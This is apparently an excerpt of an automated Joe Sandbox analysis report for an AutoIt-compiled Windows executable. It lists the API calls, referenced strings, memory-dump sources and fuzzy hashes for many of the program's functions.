                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,002B04EC,?,002B153F,?,00008000), ref: 002B195E
                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,002B04EC,?,002B153F,?,00008000), ref: 002B1983
                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,002B04EC,?,002B153F,?,00008000), ref: 002B198D
                                                          • Sleep.KERNEL32(?,?,?,?,?,?,?,002B04EC,?,002B153F,?,00008000), ref: 002B19C0
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: CounterPerformanceQuerySleep
                                                          • String ID:
                                                          • API String ID: 2875609808-0
                                                          • Opcode ID: 7cd5e1d02e28ad541936213c951d0690212a6d9c2d00c2cc95a14f5633deff41
                                                          • Instruction ID: f310add23c9704a1689c3b342dfb9798fef283e031e0ea7caa9d0c4251e5178f
                                                          • Opcode Fuzzy Hash: 7cd5e1d02e28ad541936213c951d0690212a6d9c2d00c2cc95a14f5633deff41
                                                          • Instruction Fuzzy Hash: FA117031D1095DD7CF009FA4D9A86EEBF78FF09781F404145D944BA240CB7095B08B91
                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 002DE1EA
                                                          • LoadTypeLibEx.OLEAUT32(?,00000002,0000000C), ref: 002DE201
                                                          • RegisterTypeLib.OLEAUT32(0000000C,?,00000000), ref: 002DE216
                                                          • RegisterTypeLibForUser.OLEAUT32(0000000C,?,00000000), ref: 002DE234
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Type$Register$FileLoadModuleNameUser
                                                          • String ID:
                                                          • API String ID: 1352324309-0
                                                          • Opcode ID: fa35c1d7ae7bbf8d4c77adf741d4193d25605141bec609e5e49a9cedbda04ac1
                                                          • Instruction ID: d26f514f46dc6ed603072405d67fe716b68fa427a04dd2256269493fc4b9dc62
                                                          • Opcode Fuzzy Hash: fa35c1d7ae7bbf8d4c77adf741d4193d25605141bec609e5e49a9cedbda04ac1
                                                          • Instruction Fuzzy Hash: FF118EB42513049BEB309F50ED4CF93BBBCEB00B00F10855EAA1ADA280D7B0ED549BA1
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                          • String ID:
                                                          • API String ID: 3016257755-0
                                                          • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                          • Instruction ID: 1c9f3a8c3a5123a8b22c0ee4713b70643ab6dc44faae1c11cf6c807874de36d4
                                                          • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                          • Instruction Fuzzy Hash: C301893A06A14EBBCF12AE84CC418EE3F22BB19340F688515FE1858175D336C9B1AF91
                                                          APIs
                                                          • GetWindowRect.USER32(?,?), ref: 002DB956
                                                          • ScreenToClient.USER32(?,?), ref: 002DB96E
                                                          • ScreenToClient.USER32(?,?), ref: 002DB992
                                                          • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 002DB9AD
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: ClientRectScreen$InvalidateWindow
                                                          • String ID:
                                                          • API String ID: 357397906-0
                                                          • Opcode ID: 6188db733f553253ded04ff17ffd17ed156c9a08036488633a88eb94561b2dc0
                                                          • Instruction ID: b8413ed0d217c6991e0ddfb30c61448b1363b156026e879976cb4b716a8d2a06
                                                          • Opcode Fuzzy Hash: 6188db733f553253ded04ff17ffd17ed156c9a08036488633a88eb94561b2dc0
                                                          • Instruction Fuzzy Hash: 521144B9D0024AEFDB41CF98D984AEEBBF9FF48310F104156E914E3610D775AA658F50
                                                          APIs
                                                          • _memset.LIBCMT ref: 002DBCB6
                                                          • _memset.LIBCMT ref: 002DBCC5
                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00318F20,00318F64), ref: 002DBCF4
                                                          • CloseHandle.KERNEL32 ref: 002DBD06
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: _memset$CloseCreateHandleProcess
                                                          • String ID:
                                                          • API String ID: 3277943733-0
                                                          • Opcode ID: 5da0f684d3c3a36a1d62d3a2019ddc8983e4eb0cdb6e061d7233f961e7b4687f
                                                          • Instruction ID: 3791abedc4aa41926326892604c3fa03e6eab723e232932e1484e5a428455e5c
                                                          • Opcode Fuzzy Hash: 5da0f684d3c3a36a1d62d3a2019ddc8983e4eb0cdb6e061d7233f961e7b4687f
                                                          • Instruction Fuzzy Hash: 6BF05EB2550304BFE2516B61BC89FFB3B5EEB0C750F008421BA08D91A2DB718C5297AD
                                                          APIs
                                                          • EnterCriticalSection.KERNEL32(?), ref: 002B71A1
                                                            • Part of subcall function 002B7C7F: _memset.LIBCMT ref: 002B7CB4
                                                          • _memmove.LIBCMT ref: 002B71C4
                                                          • _memset.LIBCMT ref: 002B71D1
                                                          • LeaveCriticalSection.KERNEL32(?), ref: 002B71E1
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: CriticalSection_memset$EnterLeave_memmove
                                                          • String ID:
                                                          • API String ID: 48991266-0
                                                          • Opcode ID: f0106218709f17671a4e485858f9d347e31fd9e36541d4712b175b5267fdc1fc
                                                          • Instruction ID: 560c390a6b4dbc4b8acbaa7dc6d651d899154154ffca6511e4f11a69933c67e8
                                                          • Opcode Fuzzy Hash: f0106218709f17671a4e485858f9d347e31fd9e36541d4712b175b5267fdc1fc
                                                          • Instruction Fuzzy Hash: 1FF0D076100104ABCF416F55ECC9A8ABB69EF45360F04C055FE085E25AC771A961DFB5
                                                          APIs
                                                            • Part of subcall function 002516CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00251729
                                                            • Part of subcall function 002516CF: SelectObject.GDI32(?,00000000), ref: 00251738
                                                            • Part of subcall function 002516CF: BeginPath.GDI32(?), ref: 0025174F
                                                            • Part of subcall function 002516CF: SelectObject.GDI32(?,00000000), ref: 00251778
                                                          • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 002DC3E8
                                                          • LineTo.GDI32(00000000,?,?), ref: 002DC3F5
                                                          • EndPath.GDI32(00000000), ref: 002DC405
                                                          • StrokePath.GDI32(00000000), ref: 002DC413
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                          • String ID:
                                                          • API String ID: 1539411459-0
                                                          • Opcode ID: d0223ed08d6c4be1ae8dfbe63cb249c4176f15a72358b301c552218514cddd15
                                                          • Instruction ID: 4933fdcb78e2c5958d5d09b9e66fd584da6371a6241487f8ac264041445e3fdf
                                                          • Opcode Fuzzy Hash: d0223ed08d6c4be1ae8dfbe63cb249c4176f15a72358b301c552218514cddd15
                                                          • Instruction Fuzzy Hash: 16F0B43104525AB7DB135F50AC4EFCE3F59AF05311F148000FA11291E1C3B415A5DF99
                                                          APIs
                                                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 002AAA6F
                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 002AAA82
                                                          • GetCurrentThreadId.KERNEL32 ref: 002AAA89
                                                          • AttachThreadInput.USER32(00000000), ref: 002AAA90
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                          • String ID:
                                                          • API String ID: 2710830443-0
                                                          APIs
                                                          • GetSysColor.USER32(00000008), ref: 0025260D
                                                          • SetTextColor.GDI32(?,000000FF), ref: 00252617
                                                          • SetBkMode.GDI32(?,00000001), ref: 0025262C
                                                          • GetStockObject.GDI32(00000005), ref: 00252634
                                                          • GetWindowDC.USER32(?,00000000), ref: 0028C1C4
                                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 0028C1D1
                                                          • GetPixel.GDI32(00000000,?,00000000), ref: 0028C1EA
                                                          • GetPixel.GDI32(00000000,00000000,?), ref: 0028C203
                                                          • GetPixel.GDI32(00000000,?,?), ref: 0028C223
                                                          • ReleaseDC.USER32(?,00000000), ref: 0028C22E
                                                          Similarity
                                                          • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                          • String ID:
                                                          • API String ID: 1946975507-0
                                                          APIs
                                                          • GetCurrentThread.KERNEL32 ref: 002A9339
                                                          • OpenThreadToken.ADVAPI32(00000000,?,?,?,002A8F04), ref: 002A9340
                                                          • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,002A8F04), ref: 002A934D
                                                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,002A8F04), ref: 002A9354
                                                          Similarity
                                                          • API ID: CurrentOpenProcessThreadToken
                                                          • String ID:
                                                          • API String ID: 3974789173-0
                                                          APIs
                                                          • GetDesktopWindow.USER32 ref: 00290679
                                                          • GetDC.USER32(00000000), ref: 00290683
                                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 002906A3
                                                          • ReleaseDC.USER32(?), ref: 002906C4
                                                          Similarity
                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                          • String ID:
                                                          • API String ID: 2889604237-0
                                                          APIs
                                                          • GetDesktopWindow.USER32 ref: 0029068D
                                                          • GetDC.USER32(00000000), ref: 00290697
                                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 002906A3
                                                          • ReleaseDC.USER32(?), ref: 002906C4
                                                          Similarity
                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                          • String ID:
                                                          • API String ID: 2889604237-0
                                                          APIs
                                                            • Part of subcall function 0026436A: _wcscpy.LIBCMT ref: 0026438D
                                                            • Part of subcall function 00254D37: __itow.LIBCMT ref: 00254D62
                                                            • Part of subcall function 00254D37: __swprintf.LIBCMT ref: 00254DAC
                                                          • __wcsnicmp.LIBCMT ref: 002BB670
                                                          • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 002BB739
                                                          Strings
                                                          Similarity
                                                          • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                          • String ID: LPT
                                                          • API String ID: 3222508074-1350329615
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: _memmove
                                                          • String ID: #V&
                                                          • API String ID: 4104443479-4221984388
                                                          APIs
                                                          • Sleep.KERNEL32(00000000), ref: 0025E01E
                                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 0025E037
                                                          Strings
                                                          Similarity
                                                          • API ID: GlobalMemorySleepStatus
                                                          • String ID: @
                                                          • API String ID: 2783356886-2766056989
                                                          APIs
                                                          • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 002D8186
                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 002D819B
                                                          Strings
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID: '
                                                          • API String ID: 3850602802-1997036262
                                                          APIs
                                                          • _memset.LIBCMT ref: 002C2C6A
                                                          • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 002C2CA0
                                                          Strings
                                                          Similarity
                                                          • API ID: CrackInternet_memset
                                                          • String ID: |
                                                          • API String ID: 1413715105-2343686810
                                                          APIs
                                                          • DestroyWindow.USER32(?,?,?,?), ref: 002D713C
                                                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 002D7178
                                                          Strings
                                                          Similarity
                                                          • API ID: Window$DestroyMove
                                                          • String ID: static
                                                          • API String ID: 2139405536-2160076837
                                                          APIs
                                                          • _memset.LIBCMT ref: 002B30B8
                                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 002B30F3
                                                          Strings
                                                          Similarity
                                                          • API ID: InfoItemMenu_memset
                                                          • String ID: 0
                                                          • API String ID: 2223754486-4108050209
                                                          APIs
                                                          • __snwprintf.LIBCMT ref: 002C4132
                                                            • Part of subcall function 00261A36: _memmove.LIBCMT ref: 00261A77
                                                          Strings
                                                          Similarity
                                                          • API ID: __snwprintf_memmove
                                                          • String ID: , $$AUTOITCALLVARIABLE%d
                                                          • API String ID: 3506404897-2584243854
                                                          • Opcode ID: 5671ec2438131a7ec71d7462fe567beff63bc50cb8fb095056a763f8410c4d8d
                                                          • Instruction ID: 3705f0a27c0ce152061ed6f5ae58b068a9e4ffa61c68d8809a8823c5f9ee9730
                                                          • Opcode Fuzzy Hash: 5671ec2438131a7ec71d7462fe567beff63bc50cb8fb095056a763f8410c4d8d
                                                          • Instruction Fuzzy Hash: 3521C370A20219AFCF11EF64C8A5FEE77B5AF54341F080459F948A7281DB70A9A5CFA1
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 002D6D86
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 002D6D91
                                                          Strings
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID: Combobox
                                                          • API String ID: 3850602802-2096851135
                                                          • Opcode ID: 1b47dcfc50d5d5dc7b6fd6178accb14a57249deb3b7551ac252f5f74d5d6cccf
                                                          • Instruction ID: 808ac86779ba69b138d8f1d451716b417ac5864d19b4138338f2576215066a30
                                                          • Opcode Fuzzy Hash: 1b47dcfc50d5d5dc7b6fd6178accb14a57249deb3b7551ac252f5f74d5d6cccf
                                                          • Instruction Fuzzy Hash: 7811B671320209AFEF118F54EC85FFB3B6BEB98364F114126F9149B390D6719C618B60
                                                          APIs
                                                            • Part of subcall function 00252111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0025214F
                                                            • Part of subcall function 00252111: GetStockObject.GDI32(00000011), ref: 00252163
                                                            • Part of subcall function 00252111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0025216D
                                                          • GetWindowRect.USER32(00000000,?), ref: 002D7296
                                                          • GetSysColor.USER32(00000012), ref: 002D72B0
                                                          Strings
                                                          Similarity
                                                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                          • String ID: static
                                                          • API String ID: 1983116058-2160076837
                                                          • Opcode ID: dfb08ccd20c0d1ee12a8323473b4eb1d43f7fd60c585b0ff3683a83c59adc5dd
                                                          • Instruction ID: 69a2fa43ba6f5869b601c9f8c80dc73d9ab0c63ecd8577aa9c35c7fa3b7d7eeb
                                                          • Opcode Fuzzy Hash: dfb08ccd20c0d1ee12a8323473b4eb1d43f7fd60c585b0ff3683a83c59adc5dd
                                                          • Instruction Fuzzy Hash: F221477262424AAFDB04DFB8CC89AFA7BA8FB08314F00451AFD55D3251E674A8A19B50
                                                          APIs
                                                          • _memset.LIBCMT ref: 002B31C9
                                                          • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 002B31E8
                                                          Strings
                                                          Similarity
                                                          • API ID: InfoItemMenu_memset
                                                          • String ID: 0
                                                          • API String ID: 2223754486-4108050209
                                                          • Opcode ID: e670087c44b72a0e78518f5d2ad6fd3cca68ec556c1db004ad95eb6c98d74307
                                                          • Instruction ID: 81af258ef0c56ad8e318e385293233981d43e29126e9fa6a68448ed7b75b17df
                                                          • Opcode Fuzzy Hash: e670087c44b72a0e78518f5d2ad6fd3cca68ec556c1db004ad95eb6c98d74307
                                                          • Instruction Fuzzy Hash: 3411E235931116ABDB21DE9CDC45BED77BCAB09390F184121E81AE72A0D770AF15CBA1
                                                          APIs
                                                          • DeleteObject.GDI32(?), ref: 0025351D
                                                          • DestroyWindow.USER32(?,?,00264E61), ref: 00253576
                                                          Strings
                                                          Similarity
                                                          • API ID: DeleteDestroyObjectWindow
                                                          • String ID: h.
                                                          • API String ID: 2587070983-3029464332
                                                          • Opcode ID: a236b90edcc6f948fc5cf0e3dc5b21a0cec75b6d62dad9e4d2f4133ef985f929
                                                          • Instruction ID: 5c0f1e48c09d6e7e36a39807399342fa2813e01801f5233e1ec85b489a771cbb
                                                          • Opcode Fuzzy Hash: a236b90edcc6f948fc5cf0e3dc5b21a0cec75b6d62dad9e4d2f4133ef985f929
                                                          • Instruction Fuzzy Hash: 892154346292018FCB1ADF19EC5977533F8AB4C352F48A159EC068B2A0DB70DE69CF49
                                                          APIs
                                                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 002C28F8
                                                          • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 002C2921
                                                          Strings
                                                          Similarity
                                                          • API ID: Internet$OpenOption
                                                          • String ID: <local>
                                                          • API String ID: 942729171-4266983199
                                                          • Opcode ID: d428c7b07da439bf130e278155b3fcc84ad2a5b8f90c6f2652f8b0b7bd43116d
                                                          • Instruction ID: 543590033b592b683b8700d2dfafd5dbb56ea8cf810d7483272af660b5e64cdf
                                                          • Opcode Fuzzy Hash: d428c7b07da439bf130e278155b3fcc84ad2a5b8f90c6f2652f8b0b7bd43116d
                                                          • Instruction Fuzzy Hash: AB119170511226FAEB258E518C89FB6FB68EF05751F10832EF54556140EBB058A9D6F0
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: _wcscmp
                                                          • String ID: 0.0.0.0$L,.
                                                          • API String ID: 856254489-1466378779
                                                          • Opcode ID: 2878beb8f4c521938c71079ab8903686723e2517dc7d64a1e9415db0f1dc4963
                                                          • Instruction ID: 47b683c845c3d16128985b72ecdfe3356670ea442580cfe3ed9ff67245360e09
                                                          • Opcode Fuzzy Hash: 2878beb8f4c521938c71079ab8903686723e2517dc7d64a1e9415db0f1dc4963
                                                          • Instruction Fuzzy Hash: 5E11B2352302059FCB04EE19C881ED9B7B8AF45714F50C099E90D5B3A1DA70EDA6CB64
                                                          APIs
                                                            • Part of subcall function 002C86E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,002C849D,?,00000000,?,?), ref: 002C86F7
                                                          • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 002C84A0
                                                          • htons.WSOCK32(00000000,?,00000000), ref: 002C84DD
                                                          Strings
                                                          Similarity
                                                          • API ID: ByteCharMultiWidehtonsinet_addr
                                                          • String ID: 255.255.255.255
                                                          • API String ID: 2496851823-2422070025
                                                          • Opcode ID: 9385dd7f8b1c489bc5581a017076ebeec1f2c9238deabe9df005f49f2d94d6dd
                                                          • Instruction ID: 389e1dc85bc116c21ae8e6093e3a08e5352285bfd84387041c011bcb7dd45cb2
                                                          • Opcode Fuzzy Hash: 9385dd7f8b1c489bc5581a017076ebeec1f2c9238deabe9df005f49f2d94d6dd
                                                          • Instruction Fuzzy Hash: E4110835110206ABCB24EF64DC86FAEF364FF00310F10861EFA155B2C1DB71A861CB55
                                                          APIs
                                                            • Part of subcall function 00261A36: _memmove.LIBCMT ref: 00261A77
                                                            • Part of subcall function 002AB79A: GetClassNameW.USER32(?,?,000000FF), ref: 002AB7BD
                                                          • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 002A9A2B
                                                          Strings
                                                          Similarity
                                                          • API ID: ClassMessageNameSend_memmove
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 372448540-1403004172
                                                          • Opcode ID: 15a85cf7cc629100ac384136bcf2bec63d8586b77101cf2296746b12a18a22b2
                                                          • Instruction ID: 23a230352266a41e38d6f75a3ec2289d90a5bdaac6821f4a15ed531143a2682a
                                                          • Opcode Fuzzy Hash: 15a85cf7cc629100ac384136bcf2bec63d8586b77101cf2296746b12a18a22b2
                                                          • Instruction Fuzzy Hash: 3401F571A62254ABCB14EFA4CC51DFEB369AF57320B14060AF861973C2DE305868CA60
                                                          APIs
                                                          • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0025BC07
                                                            • Part of subcall function 00261821: _memmove.LIBCMT ref: 0026185B
                                                          • _wcscat.LIBCMT ref: 00293593
                                                          Strings
                                                          Similarity
                                                          • API ID: FullNamePath_memmove_wcscat
                                                          • String ID: s1
                                                          • API String ID: 257928180-2986196627
                                                          • Opcode ID: 27b6099ced9b4980603aafb29ee4adea061cf9541a50df04c397ee20b7de1abf
                                                          • Instruction ID: aa6580ff29728ce985c8cdc6e97b3730a3133539b1f093e158d14337ff7f30b9
                                                          • Opcode Fuzzy Hash: 27b6099ced9b4980603aafb29ee4adea061cf9541a50df04c397ee20b7de1abf
                                                          • Instruction Fuzzy Hash: 1D1186349242089B8B06EFB49881DCD77B8FF0C352B1044A6BD4597190EF709BE85F95
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: __fread_nolock_memmove
                                                          • String ID: EA06
                                                          • API String ID: 1988441806-3962188686
                                                          • Opcode ID: 08d99bc37a4ade147ced7b6aab81231edfb8ee3830a1ded4a14b0a6fb404f8e8
                                                          • Instruction ID: 8a133b4a59b298064ad25bf8a2ea1bb0dc4d6e5b7a0cc675216721f431df4456
                                                          • Opcode Fuzzy Hash: 08d99bc37a4ade147ced7b6aab81231edfb8ee3830a1ded4a14b0a6fb404f8e8
                                                          • Instruction Fuzzy Hash: A301F9728142587EDB18CBA8CC56EFEBBF89F01301F00429AF556D2181E5B5A6148B60
                                                          APIs
                                                            • Part of subcall function 00261A36: _memmove.LIBCMT ref: 00261A77
                                                            • Part of subcall function 002AB79A: GetClassNameW.USER32(?,?,000000FF), ref: 002AB7BD
                                                          • SendMessageW.USER32(?,00000180,00000000,?), ref: 002A9923
                                                          Strings
                                                          Similarity
                                                          • API ID: ClassMessageNameSend_memmove
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 372448540-1403004172
                                                          • Opcode ID: aa68623a119fa960f7ee22625d58dabb59920329a4947197864e28311aa85b08
                                                          • Instruction ID: 5859529ea25209cfa756def0eebc560a534be20061e4a4a5a5708aa40e9bf6c8
                                                          • Opcode Fuzzy Hash: aa68623a119fa960f7ee22625d58dabb59920329a4947197864e28311aa85b08
                                                          • Instruction Fuzzy Hash: 6101A772A621057BCB15EBA0DD62EFFB3AC9F16340F140119B851A32C1DE505E78DAB1
                                                          APIs
                                                            • Part of subcall function 00261A36: _memmove.LIBCMT ref: 00261A77
                                                            • Part of subcall function 002AB79A: GetClassNameW.USER32(?,?,000000FF), ref: 002AB7BD
                                                          • SendMessageW.USER32(?,00000182,?,00000000), ref: 002A99A6
                                                          Strings
                                                          Similarity
                                                          • API ID: ClassMessageNameSend_memmove
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 372448540-1403004172
                                                          • Opcode ID: dab4e8c72b224075d798458c98f23fa299c07c7f63b1870c22b24493590c2c82
                                                          • Instruction ID: 4895aa25bbd54262887931177294b69ea4d81fe8bdad0116bbd32580a3768c87
                                                          • Opcode Fuzzy Hash: dab4e8c72b224075d798458c98f23fa299c07c7f63b1870c22b24493590c2c82
                                                          • Instruction Fuzzy Hash: 6101DB72A6210577CB11EBA4CD52EFFB3AC9F16340F140019B845A3281DE655E78DA72
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: __calloc_crt
                                                          • String ID: @b1
                                                          • API String ID: 3494438863-2312003021
